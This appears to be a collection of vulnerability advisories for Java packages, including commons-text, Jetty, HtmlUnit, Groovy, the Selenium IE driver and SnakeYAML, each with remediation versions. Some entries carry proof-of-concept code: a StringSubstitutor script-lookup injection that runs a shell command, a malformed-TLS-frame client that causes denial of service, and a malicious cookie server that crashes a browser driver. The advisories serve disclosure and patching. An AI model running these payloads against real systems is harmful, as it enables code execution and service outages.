Find, fix and prevent vulnerabilities in your code.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution via the StringSubstitutor interpolator object. Exploiting this vulnerability is possible when untrusted data flows into the StringSubstitutor.replace() or StringSubstitutor.replaceIn() methods.

Due to the nature of these methods as ones that process application data and not user input, a remote attacker would need prior access to a system in the affected environment positioned to supply such data.

Notes

The Nashorn scripting engine that can be used to exploit this vulnerability was available by default in JDKs up to 14.0.2. As of JDK 15, this vulnerability can only be exploited if another scripting engine has been added, such as JEXL.

Vulnerable lookups:

1. script - executes expressions using the JVM script execution engine (javax.script)

2. dns - resolves dns records

3. url - loads values from urls, including from remote servers

PoC

final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String out = interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}");
System.out.println(out);

Remediation

Upgrade org.apache.commons:commons-text to version 1.10.0 or higher.

References

• Apache Lists
• GitHub Commit
• GitHub PR
• GitHub Release
• Snyk Blog
• Nuclei Templates

Overview

net.sourceforge.htmlunit:htmlunit is a GUI-Less browser for Java programs

Affected versions of this package are vulnerable to Denial of Service (DoS). If HtmlUnit runs on user-supplied web pages, an attacker may supply content that causes HtmlUnit to crash by a stack overflow.

Note:

In case the payload is sent to an API endpoint which accepts user-supplied input without sanitization or validation, it is possible to trigger this vulnerability without user interaction.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade net.sourceforge.htmlunit:htmlunit to version 2.70.0 or higher.

References

• Chromium Bugs
• GitHub Advisory
• GitHub Commit

Overview

org.codehaus.groovy:groovy is a language for the JVM

Affected versions of this package are vulnerable to Information Disclosure. Groovy may create temporary directories within the OS temporary directory which is shared between all users on affected systems. This vulnerability only impacts Unix-like systems, and very old versions of Mac OSX and Windows.

Remediation

Upgrade org.codehaus.groovy:groovy to version 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2 or higher.

References

• GitHub Commit
• Jira Issue

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the MetaDataBuilder.checkSize function. An attacker provide a very large or negative length value for the HTTP/2 HPACK header values. This can lead to an integer overflow, resulting in a very large buffer allocation on the server.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.53.v20231009, 10.0.16, 11.0.16 or higher.

References

• GitHub Commit
• GitHub PR
• GitHub Release
• GitHub Release
• GitHub Release

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). CPU usage can reach 100% upon receiving a large invalid TLS frame.

PoC

// server 
public class MyServer {
    public static void startServer() throws Exception {
         SslContextFactory sslContextFactory = new SslContextFactory.Server();
         HttpConnectionFactory httpFactory = new HttpConnectionFactory();
         Server server = new Server();
         ServerConnector connector = new 
         ServerConnector(server,null,null,null,1,-1,AbstractConnectionFactory.getFactories(sslContextFactory ,httpFactory));
         connector.setPort(9988);
         connector.setHost("localhost");
         server.setConnectors(new Connector[]{connector});
         ServletContextHandler context = new ServletContextHandler();
         context.setContextPath("/");
         HandlerCollection handlerCollection= new HandlerCollection();
         handlerCollection.setHandlers(new Handler[]{context,new DefaultHandler()});
         server.setHandler(handlerCollection);
         server.start();
         server.join();
    }
     public static void main(String[] args) throws Exception {
        startServer();
     }
}



public class MyClient {
    // client 
    private static byte[] buildMessage() {
       byte[] bytes = new byte[20005];
       bytes[0] = 22;  // record type
       bytes[1] = 3;   // major version
       bytes[2] = 3;   // minor version
       bytes[3] = 78; // record length 2 bytes
       bytes[4] = 32;  // record length
    
       bytes[5] = 1; // message type
       bytes[6] = 0; // message length 3 bytes
       bytes[7] = 78;
       bytes[8] = 23;
      
      for( int i = 9; i < bytes.length; i++) {
          bytes[i] = 1;
      }
      return bytes;
    }
    
    public static void sendMessage() throws Exception {
        byte[] bytes = buildMessage();
        SocketFactory socketFactory = SocketFactory.getDefault();
        Socket socket = socketFactory.createSocket("localhost",9988);
        socket.getOutputStream().write(bytes);
        socket.close();
    }

    public static void main(String[] args) throws Exception {
        sendMessage();
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-io to version 9.4.39.v20210325, 10.0.2, 11.0.2 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Issue

Overview

Affected versions of this package are vulnerable to NULL Pointer Dereference due to an insufficient check on CookieWndProc function. An attacker can cause the application to crash by sending specially crafted data that triggers this condition.

PoC

Attacker Server Code

from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timedelta

class CustomHTTPRequestHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        # Send response status code
        self.send_response(200)

        # Send headers
        self.send_header('Content-type', 'text/html')
        # Set the cookie expiration to one day in the future
        expiration_date = (datetime.utcnow() + timedelta(days=1)).strftime('%a, %d %b %Y %H:%M:%S GMT')
        
        well_formed_cookie = f"cookie_name=cookie_value; Domain=127.0.0.1; Path=/; HttpOnly; Expires={expiration_date};"
        self.send_header('Set-Cookie', well_formed_cookie)

        malicious_cookie = f"cookie_name2" #crash
        self.send_header('Set-Cookie', malicious_cookie)

        self.end_headers()

        # Send message back to client
        message = "Hello world!"
        self.wfile.write(bytes(message, "utf8"))
        return

def run():
    print('Starting server...')
    server_address = ('127.0.0.1', 8090)
    httpd = HTTPServer(server_address, CustomHTTPRequestHandler)
    print('Server is running...')
    httpd.serve_forever()

run()

Example Victim Code

from selenium import webdriver
import logging
import time

handler = logging.FileHandler("sel.log")
logger = logging.getLogger('selenium')
logging.basicConfig(level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)

options = webdriver.IeOptions()
options.ignore_zoom_level = True
options.ignore_protected_mode_settings = True
options.attach_to_edge_chrome = True
options.initial_browser_url = 'https://selenium.dev'
service = webdriver.IeService(log_file="ie.log", log_level='DEBUG')
driver = webdriver.Ie(options=options,service=service)

driver.set_page_load_timeout(20)
print("Getting the page: ")

try:
    driver.get("http://127.0.0.1:8090/")
except Exception as e:
    print(e)

print("Got the page!")
print("Get Cookies: ")
cookies = driver.get_cookies()
print(cookies)
time.sleep(3)
driver.quit()

Remediation

Upgrade org.seleniumhq.selenium:selenium-ie-driver to version 4.14.1 or higher.

References

• GitHub Commit

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-38749

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

• Bitbucket Commit
• BitBucket Issues
• GitHub Commit

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-25857

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

• Bitbucket Commit
• BitBucket Issues
• GitHub Commit